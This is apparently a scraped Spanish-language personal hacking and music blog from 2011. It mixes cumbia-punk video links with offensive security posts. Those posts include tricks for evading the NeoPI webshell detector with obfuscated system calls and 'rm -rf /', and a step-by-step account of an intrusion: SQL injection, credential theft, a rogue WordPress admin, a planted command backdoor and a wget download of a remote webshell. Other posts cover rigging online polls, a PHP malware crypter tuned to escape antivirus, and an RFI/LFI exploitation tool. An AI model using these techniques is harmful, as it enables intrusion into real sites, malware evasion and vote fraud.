El rincon de seth

Punkycacos live at Speed King

elrincondeseth — Wed, 02 Nov 2011 06:04:09 +0000

Para todos los fans
La musica empieza mas o menos a los 20 minutos

Sos bueno con las inyecciones sql? rompeme la web

elrincondeseth — Sat, 17 Sep 2011 22:53:28 +0000

Hice una web para que que practiquen sqli con y sin filtros
Va a estar online minimo una semana (a menos que me rompan todo antes) http://vepeese.xdblog.com.ar/

Coso para bypassear logins

elrincondeseth — Wed, 24 Aug 2011 08:34:00 +0000

Dejo este script. Hay que instalarlo (hace falta greasemonkey), ir a un login y empezar a apretar botones para ver si alguno te loguea.
Lo que hace es meter cookies para tratar de explotar esto.

http://xd-blog.com.ar/descargas/programas/cookie_login_bypass/script.1.0.user.js

Bypasseando NeoPI

elrincondeseth — Wed, 17 Aug 2011 06:43:22 +0000

Estaba perdiendo el tiempo en reddit y vi NeoPI. Es un programa que detecta webshells y está bastante bueno, encuentra emelco, una shell osfuscada y una wso metida al final de una imagen.
Tiene varias formas de detectar las shells, pero todas se puede bypassear:

Strings largas: Si codificas con base64 una shell comun vas a tener un string muy largo y va a saltar al toque. Simplemente metemos espacios para separar el string, base64_decode los va a ignorar

Entropia: Cuanta mas variado es el contendido del archivo, mas va a llamar la atención:

	def calculate(self,data,filename):
		"""Calculate the entropy for 'data' and append result to entropy_results array."""

		if not data:
			return 0
		entropy = 0
		for x in range(256):
			p_x = float(data.count(chr(x)))/len(data)
			if p_x > 0:
				entropy += - p_x * math.log(p_x, 2)
		self.results.append({"filename":filename, "value":entropy})
		return entropy

Si metemos espacios despues de cada caracter del string en base64 aumentamos el largo del archivo y la entropia va a ser menor. Tambien se puede agregar un comentario con aaaaaaaaaaaaaaaaaaaaaaaaa(metele a’s hasta que la entropia baje lo suficiente)

Indice de coincidencia: No le di bola, la una shell que encontró fue la que estaba despues de una imagen
Firmas: Hay que evitar usar eval(), system() y demas funciones comunes en las webshells. Se pueden usar funciones globales asi:
```
$a = 'sys'.'tem'; 
$a('rm -rf /');
```
eval() no es una función pero se puede reemplazar por algo asi:
```
file_put_contents('/tmp/asd', 'codigo'); 
include('/tmp/asd');
```

Este codigo se esconde joya en un directorio de wordpress 3:

Simple Machines forum (SMF) 2.0 session hijacking

elrincondeseth — Mon, 08 Aug 2011 03:21:25 +0000

X-C3ll encontró la vulnerabilidad y después yo hice el exploit y encontré otra forma mas copada de explotarla. Pueden ver su primer post acá
Simple Machines forum (SMF) 2.0 session hijacking

Reto 5

elrincondeseth — Fri, 05 Aug 2011 18:54:05 +0000

De la serie “…te regalo un peluche de…: http://xd-blog.com.ar/juego/5/

DuckDuckGo

elrincondeseth — Wed, 03 Aug 2011 01:51:30 +0000

Hace mas o menos cinco meses que mi buscador favorito es duckduckgo. Comparandolo con yahoo o bing tiene una ventaja muy obvia: no es una mierda. Al compararlo con google el asunto se pone mas peleado asi que voy a linkear bastante.
Si sos de los que se preocupan por su privacidad, ddg te va a gustar porque no te sigue ni te cambia los resultados, evita que tu navegador mande el referer en los links salientes y tiene https. Capaz queres ver la politica de privacidad (una de las primeras que puedo entender de una)
Si sos de los que les gusta modificar todo, mirá las opciones, podes modificar varias cosas
Si queres ahorrar tiempo, mirá esto y esto. Lo que mas te va a ahorrar tiempo son los !bang, probá poniendo !taringa, !g o !gi al final o al principio de tu busqueda.
Si usas firefox, instalá el addon para tenerlo como buscador predeterminado.

Los unicos dos problemas que le encuentro es que se confunde con algunas búsquedas y le falta indexar mas webs para otras, pero en esos casos (que son pocos) pongo !g y ya estoy de vuelta en google.
Dejo algunas busquedas para que vean lo groso que es.

https://duckduckgo.com/, #duckduckgo en freenode

RFI por ftp

elrincondeseth — Fri, 08 Jul 2011 13:39:45 +0000

Hace bastante estaba aburrido e hice que mi pagina loguee algunos intentos de ataque. Generalmente se ve alguien que mete una comilla, algunos bots que llegan por un enlace viejo (quedan logueados como ataque por un error), algun escaneo de acunetix, scanners de inyecciones sql en plugins de joomla/phpbb/algun cms que esté en exploitdb o scanners de rfi (todavia funcionan?). Generalmente los scanners de rfi ponen un archivo externo al que se accede por http, pero esta vez parece que trataron de bypassear algunos filtros:

Capaz hay algun brasilero leyendo este texto sobre bypass de filtros?

Buscando la url en google y ddg para ver cuantas webs habian escaneado me encontre con esto:

Sos tan ciego que no ves a un gorila

elrincondeseth — Sat, 02 Jul 2011 21:06:54 +0000

Y te lo pruebo: http://www.theinvisiblegorilla.com/videos.html

Mas cumbia punk!

elrincondeseth — Mon, 13 Jun 2011 04:03:12 +0000

En mi intento de influenciar futuros músicos para lograr que en el futuro podamos escuchar los mejores temas del retutu tocados mas rapido y con bateria en el luna park, sigo linkeando videos de estas mezclas entre cumbia y punk. Hay un par de temas medio pop, pero fueron lo mejor que encontré, si alguien hace un cover de yo no se mañana tocandolo como tukera me avisa.

Una calle me separa – Patada en la nuca

La danza de los mirlos

Su florcita – Placas 92

Su florcita – Turi

La fiesta de tu hermana – Telefono descompuesto

El humo de mi fasito

Yo no se mañana – Expedición ladines

Yo no se mañana – The rotten

Un par de videos que no son cumbia punk pero la rompen:

Nalga – Cumbiagore sabrosona

Para no verte mas – The rotten

En mi exaustiva investigación de la cumbiancha de tres tonos encontré un par de bandas que se zarpan en grosas. Pongo un par de videos, pero hay que bajarse los cds:

El talibán del amor – Dead menems

Socios de paja – Dead menems

Los chetos son buenos – Dead menems

La china es cumbianchera – Kumbia queers

Metamorfosis adolescente – Kumbia queers

Chica de metal – Kumbia queers

No se por que colgué y no puse los videos antes, pero tocó punkycacos en vivo en parque centenario y estan todos los videos en youtube: Anarkia para los guachines

Cuando tenga ganas hago un post re groso sobre oxizakre. Si quieren que lo haga antes, pueden donar bitcoins o fernucos.

Camaras

elrincondeseth — Sat, 04 Jun 2011 08:17:55 +0000

Aburrimiento de las 5 am

Ezine Level-23 #1

elrincondeseth — Fri, 03 Jun 2011 08:39:35 +0000

http://www.multiupload.com/1391H2REK8

http://xd-blog.com.ar//descargas/ezines/level-23/level-23-1.pdf

Diccionarios

elrincondeseth — Fri, 03 Jun 2011 05:47:09 +0000

Subí algunos a http://xd-blog.com.ar/descargas/diccionarios/

Varios son de http://www.skullsecurity.org/wiki/index.php/Passwords

Sacar la redirección de los links de taringa

elrincondeseth — Fri, 03 Jun 2011 05:40:12 +0000

Desde hace un tiempo taringa redirecciona todos los links salientes a una pagina donde muestra un alert() diciendote que salis de taringa

Puede ser que pare el phishing, pero para copypastear las urls en el jdownloader rompia mucho las pelotas, ahi que hice este script para greasemonkey:

// ==UserScript==

// @name taringa

// @namespace http://xd-blog.com.ar/

// @description Saca el out?url de taringa

// @include http://www.taringa.net/*

// ==/UserScript==

//agregar link para reportar spam

var allElements, thisElement, link;

allElements = document.getElementsByTagName(‘a’);

for (var i = 0; i < allElements.length; i++) {

thisElement = allElements[i];

if(thisElement.href.search(‘http://links.itaringa.net/out?’)!=-1){

link = thisElement.href.split(‘http://links.itaringa.net/out?’)

thisElement.href = link[1];

}

Relato de un ataque

elrincondeseth — Fri, 03 Jun 2011 00:03:16 +0000

Voy a contar como fuimos escalando privilegios en una web.
Arrancó con una sqli:

http://example.com/products.php?id=boxes

Pongo una comilla:

http://example.com/products.php?id=boxes’

y da error:

mysql_query() Error: ‘unclosed quotation mark in /var/www/example/web/products.php’

Inyectamos sin romper la query:
http://example.com/products.php?id=boxes’ and 1=1 — -

Anulamos el select original:
http://example.com/products.php?id=boxes’ and 1=0 — -

Buscamos la cantidad de columnas:
http://example.com/products.php?id=boxes’ and 1=0 union select 1 — - ==> Muestra “1″
http://example.com/products.php?id=boxes’ and 1=0 union select 1,2 — - ==> Error
Tiene una columna

Tratamos de leer el archivo (la ruta sale de los errores de las querys invalidas):
http://example.com/products.php?id=boxes’ and 1=0 union select load_file(‘/var/www/example/web/products.php’) — -

Entre otras cosas sale:

Leo database.php:
http://example.com/products.php?id=boxes’ and 1=0 union select load_file(‘/var/www/example/web/database.php’) — -

Entre otras cosas sale:

function connect_db($db_name){
    $server = "localhost";
    $username = "example_example";
    $password = "1254387542266";
    if(@mysql_connect($server, $username, $password)){
        if(@mysql_select_db($db_name)){
            return TRUE;
        }
    }
    return FALSE;
}

function call_external_db($db_name){
    $server = "localhost";
    $username = "ex4mpl3_root";
    $password = "86901283412";
    if(mysql_connect($server, $username, $password) or die(mysql_error())){
        if(@mysql_select_db($db_name)){
            return TRUE;
        }else{
            return FALSE;
        }
    }
    return FALSE;
}

A pesar de que los nombres de las funciones sugieran otra cosa, las dos funciones conectan a localhost y lo que cambia son el usuario y la contraseña.

Vemos si se puede conectar a mysql desde internet:

sudo nmap -sV -p 3306 -PN mistralni.co.uk

Sale algo asi:

3306/tcp open  mysql   MySQL 5.0

Probamos con el primer usuario:

mysql -h example.com -u example_example -p

No anda, asi que es lo mismo con el segundo. Funciona

Desde el cliente de mysql trato de escribir una shell:

select '

Probé con varias carpetas que sabia que existian, pero en ninguna tenia permisos de escritura
Seguí bajando archivos con load_file, pero en ninguno encontré vulnerabilidades que no sean sqli.

Miro las bases de datos:

mysql> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| example            |
| example_admin      |
| example_orders     |
| example_products   |
| example_users      |
| example_wordpress  |
| mysql              |
+--------------------+

Hay un par de claves hasheadas, alguna están en DBs de hashes, pero no las usamos.
Me llama la atención el wordpress que no habia visto al navegar por la pagina, asi que lo busco con google y de paso me fijo si hay algo mas que no haya visto:

site:example.com

El wordpress resultó estar en /articles/

Despues hay que crear un usuario en wordpress, se guardan en wp_users:

select * from wp_users;

Y hay que imitar el formato de lo que sale:

insert into wp_users (id, user_login, user_pass, user_nicename, user_email, user_url, user_registered, user_activation_key, user_status, display_name) values (5, 'caca', md5('caca'), 'caca', 'caca@caca.com', '', '2011-1-1 10:10:10', '', 0, 'caca');

Después hay que darle privilegios de administrador, para eso se escribe en wp_usermeta:

+----------+---------+-----------------+-------------------------------------+
| umeta_id | user_id | meta_key        | meta_value                          |
+----------+---------+-----------------+-------------------------------------+
|       99 |       5 | wp_capabilities | a:1:{s:13:"administrator";s:1:"1";} |
+----------+---------+-----------------+-------------------------------------+

(no pongo la query, pero es similar a la anterior)

Entré con el usuario nuevo a wordpress (/articles/wp-admin/) y fui al editor de plugins. Habia uno con permisos de escritura, asi que le meti una shell al principio:

if ( isset($_GET['cmd']) ) {
    system($_GET['cmd'];
    die();
}

Con eso subí una webshell:

plugin.php?cmd=wget http://emelco.googlecode.com/svn/trunk/emelco-1.4.php

Y listo, lo que yo queria era descargarme toda la web. Se podia tratar de rootear o defacear pero no me interesa

Formas de alterar encuestas

elrincondeseth — Tue, 31 May 2011 17:18:43 +0000

http://hackaday.com/2009/04/29/times-poll-hacked/
http://musicmachinery.com/2009/04/15/inside-the-precision-hack/

Esto va a ser medio croto, pero espero que por lo menos les de ideas

Si te banea por cookies, simplemente se borran las cookies con firecookie, add and edit cookies, etc
https://addons.mozilla.org/es-ES/firefox/addon/add-n-edit-cookies/
https://addons.mozilla.org/es-ES/firefox/addon/firecookie/

Si el ban es por ip:
Se puede tratar de spoofear con X-Forwarded-For:
http://www.elartedeprogramar.cl/seguridad_web/ip_spoofing_14.0.html
https://www.underground.org.mx/index.php?topic=21798.0
Podes usar proxys (tor, foxyproxy, etc)
https://addons.mozilla.org/es-ES/firefox/addon/foxyproxy-standard/
https://duckduckgo.com/?q=proxy+list
https://www.torproject.org/
Se puede usar csrf para que voten otros. Por ejemplo, si la url para votar es http://example.com/vote.php?name=pepe&vote=true, podes poner en la firma del foro [img]http://example.com/vote.php?name=pepe&vote=true[/img]

A veces se puede elegir un puntaje. Me acuerdo de una votación que te permitia darle a cada participante un voto del 1 al 5 y mostraba las opciones en selects. Cambiando el valor con live http headers por 32000, dabas 32k puntos en una sola petición. También podria ser posible darles votos negativos a los demás

Para hacer muchas peticiones:
php + curl, lo mas dificil pero tambien mas flexible http://www.php.net/manual/es/book.curl.php
live http headers, es facil de usar y sirve cuando todas las peticiones son iguales https://addons.mozilla.org/en-US/firefox/addon/live-http-headers/
imacros, es mejor para cuando hay mucho javascript modificando la pagina https://addons.mozilla.org/en-US/firefox/addon/imacros-for-firefox/

Ban por usuario:
A veces tenés que estar registrado para poder votar y cada usuario puede hacerlo una vez sola.
Para crear cuentas rapido, con emails descartables, http://10minutemail.com/10MinuteMail/index.html http://www.guerrillamail.com/
También podes usar cuentas ya existentes. Por ejemplo, en smf ves la lista de usuarios, te fijas cuales tienen 1234 de clave y votas con esas cuentas

AnalCrypter (php + bamcompile)

elrincondeseth — Wed, 18 May 2011 03:49:50 +0000

File Info

Report date: 2011-05-17 15:00:25 (GMT 1)
File name: spy-net-exe
File size: 282624 bytes
MD5 Hash: 5baf07a70240fdc4f21 93aa84c759ce7
SHA1 Hash: 04a29746c6447897275 9b2513aa18ca5e3e439 7d
Detection rate: 5 on 6 (83%)
Status: INFECTED

Detections

AVG – PSW.Generic8.ISF
Avira AntiVir – TR/Crypt.CFI.Gen
ClamAV – Trojan.Agent-171451
Emsisoft – Worm.Win32.Rebhip!IK
TrendMicro -
Zoner – Trojan.Agent.171451

Scan report generated by
NoVirusThanks.org

File Info

Report date: 2011-05-17 15:02:09 (GMT 1)
File name: anal-exe
File size: 969216 bytes
MD5 Hash: e5655ffe1d229181fbb fc56aef644b8a
SHA1 Hash: fd5977a51cb8a6d2774 17b09b5ea9bce6b8dbd 27
Detection rate: 1 on 6 (17%)
Status: INFECTED

Detections

AVG -
Avira AntiVir -
ClamAV -
Emsisoft -
TrendMicro -
Zoner – Trojan.Small-2497

Scan report generated by
NoVirusThanks.org

En novirusthanks, al stub solo lo detecta zoner, pero no puedo hacer nada porque detecta a todos lo que pasas por bamcompile.
Lo probé en windows xp sp3 y anduvo. En xp sp2 creo que no se oculta la ventana negra del cmd. En vista y 7 ni idea que pasa.

el readme:

>>>>>>>>>>>>>>>>>>>>>>>>>>>>
>>>>>>>>Como usarlo>>>>>>>>>
>>>>>>>>>>>>>>>>>>>>>>>>>>>>
-La primera vez, ejecut� compile.bat
-Pon� tu icono en lugar de icono.ico
-Pon� el malware en lugar de malware.exe
-Ejecut� crypter.exe
-???
-Profit!

>>>>>>>>>>>>>>>>>>>>>>>>>>>>
>>>>>>>Como funciona>>>>>>>>
>>>>>>>>>>>>>>>>>>>>>>>>>>>>
Tanto el stub como el programa que encripta est�n hechos en php y son pasados a exe con bamcompile
Para entenderlo mejor, explico que es cada archivo:
sauce/ es el directorio con los archivos php
sauce/stub.php es el stub sin modificar
sauce/custom-stub.php es el stub con el malware adentro, listo para convertirlo a exe
sauce/crypter.php encripta el malware, lo mete en el stub y ejecuta bamcompile
compile.bat genera crypter.exe a partir de crypter.php
bamcompile.exe es usado para convertir los php a exe
icono.ico es el icono que se usa en el exe del malware encriptado (por defecto, uno que venia con bamcompile)
malware.exe es el malware sin encriptar (calc.exe para probar)
bamcompile_readme.txt es el readme de bamcompile, puede ser util para indetectar o achicar el resultado
stub.bcp es el archivo que le indica a bamcompile como construir malware-custom.exe
crypter.bcp le indica a bamcompile como construir crypter.exe

El crypter: lee el stub, lee el malware, pasa el malware a base64 (si, no lo encripta en realidad, hay que cambiar esto para que el resultado final sea mas chico), lo mete en lugar de la cadena #REPLACE# en el stub, guarda esto en custom-stub.php y ejecuta bamcompile (con -c para comprimir con upx).
Muestra unas letras que al principio eran para debuguear y las dej� como indicadores de progreso.
Al principio habia hecho el c�digo con file_get_contents() y file_put_contents() pero no servia porque bamcompile usa php 4, asi que copi� las dos funciones de php.net. Hay que cambiar eso por fopen(), fwrite(), fread(), feof() y fclose().

El stub: tiene un lugar reservado : $a=’#REPLACE#’; En custom-stub.php, ahi ya va a estar el malware encriptado y el c�digo va a parecer mas l�gico.
$w es ‘base64_decode’.
$b es la ruta del exe a donde se va a escribir el malware desencriptado.
$e es la ruta del bat, ya voy a explicar eso.
$q = $e, osfuscado
Se escribe el malware desemcriptado en $b
Se escribe en el bat: cmdow.exe @ /HID\nX:/ruta/al/archivo.exe
Eso es para poder ocultar la ventana del cmd con cmdow, aunque no creo que funcione en todas las m�quinas, es otra cosa que hay que mejorar. Adem�s, se llega a ver un segundo la ventana.
Finalmente se ejecuta el bat
Tiene el mismo problema con file_put_contents() que crypter.php

Hay mas problemas, como que los .bcp est�n mal hechos y a todos los .exe les mete todos los archivos de sauce
No puedo hacer que no sea detectado por zoner, eso marca como dropper a cualquier cosa generada con bamcompile
No estoy seguro si es $_ENV['TMP'] o $_ENV['TEMP'], en mi m�quina funcionaban las dos
Malware.exe es demasiado grande y agranda el rar al pedo

Descarga

Diccionario con nombres

elrincondeseth — Tue, 10 May 2011 19:28:20 +0000

Son los que figuran en la web del gobierno de bs as

http://xd-blog.com.ar//descargas/nombres.txt

Decime la clave y ganate un peluche de… ok, no mas peluches gratis

elrincondeseth — Tue, 10 May 2011 04:49:32 +0000

http://xd-blog.com.ar/juego/3/

Perón

elrincondeseth — Tue, 26 Apr 2011 18:52:40 +0000

http://www.youtube.com/watch?v=XwYSiCFRsuc
http://www.youtube.com/watch?v=FkQtbTYpPlM&feature=related
http://www.youtube.com/watch?v=HGDUmWQY5_k&feature=related
http://www.youtube.com/watch?v=1dPt4ViR0eY&feature=related
http://www.youtube.com/watch?v=ogyRbEEH0es&feature=related
http://www.youtube.com/watch?v=jbgXGzzAlrE&feature=related
http://www.youtube.com/watch?v=IePVzHlnyEg&feature=related

frenchitas

elrincondeseth — Fri, 15 Apr 2011 03:37:13 +0000

No, nada que ver, no voy a hablar de papas fritas de los 90, pero como ya escribí una banda de posts parecidos, no se que titulo ponerle.

Turros bailando piola y spiderman bailando piola
Habia una vez un vago que salia a la calle sin chumbo. El loco cantaba en su una bici, pero lo hacia para el orto porque en realidad su especialidad era filosofar sobre los chetos. No se que tiene que ver con esa historia, pero tenes que escuchar shabba ranks
Ok, capaz que estás pensando “si no hay una guitarra no es música”. Te entiendo, asi que esto es para vos: El tano romano tocando ácido argentino en cual es el 13/4/2011. Si te parece que el metal es para putos con tachas y cuero, mirá el video de esta piba punk… Bueno, no. Me dejé llevar por el título pero mas que punk es alguna de esas variedades chotas del metal.
Me cansé de escribir boludeces, dejo links.
El bidón: arriba de la mensa (versión re loca mezclada con abarajame en la bañera, señor cobranza y puto), sucia y tomando birra en lo de daniel
Mayonesa – agachadita
Karibe con k – ni idea el nombre del tema, pero deberia ser “pichones de locomia“
Karibe con k – la pachanga (si, es un cover de vilma palma. Demasiado groso)
Lo mejor, lejos: Warschawjanka y Varshavianka

xfi: RFI & LFI automated explotation

elrincondeseth — Thu, 14 Apr 2011 23:24:05 +0000

DESCARGA

::~/php/xfi$ php xfi.php –help
+———————————————————————————-+
By seth: xd [-dot-] seth [.at.] gmail {~dot~} com http://xd-blog.com.ar/
v0.1 https://code.google.com/p/xfi/
+———————————————————————————-+

Usage: php xfi.php [options] –url=

Options:
–no-rfi Doesn’t try to exploit RFI.
–no-lfi Doesn’t try to exploit LFI.
–no-inject-logs Doesn’t inject code in apache logs for exploiting LFI.
–method L for lfi. R for rfi. Followed by exploit number. If ommited, will autodetect.
–help function help(){help();}
–url Url to attack.

Examples:
php xfi.php –url=”http://example.com/vuln.php?page=” id
Will try all methods to run id
php xfi.php –no-rfi –no-inject-logs –url=”http://example.com/vuln.php?page=” id
Will try only lfi without injecting code to the logs
php xfi.php –method=R8 –url=”http://example.com/vuln.php?page=” id
Will use the 8th RFI exploit (data: url with null byte in the end)

I s2 pixels

elrincondeseth — Thu, 14 Apr 2011 04:40:49 +0000

Lo vi en un pin y me di cuenta de que lo tenia que postear acá

Covers

elrincondeseth — Sat, 02 Apr 2011 05:57:35 +0000

Noche de covers, para vos basura

Destruccion (Yo tengo un pedazo, cover v8)

Gorra basura – antipoliticos (cover mala fama) (repetido, pero es alto tema)

Todavia hay estúpidos que no escucharon esto

Panic show – los lirios (probablemente el mejor tema del post)
Como ali – la repandilla
Droga – Supermerk2 (también es repetido)
Un poco de amor francés – Los del fuego
Aun Estas En Mis Sueños – Los Del Fuego
Persiana Americana – Los del Fuego
De musica ligera – Los palmeras
Los llamadores – La bomba loca
La liga – Se dice de mi
Mil horas – Dedo verde
Mil horas – Altos cumbieros
Una vela – repiola (Otro tema zarpado)

covers cumbia.rar

Encriptador de webshells

elrincondeseth — Thu, 24 Mar 2011 07:19:31 +0000

No sirve para c99, emelco o alguna de esas. Hay que hacerla a propósito para esto, pero los resultados están buenos

http://xd-blog.com.ar/makeshell/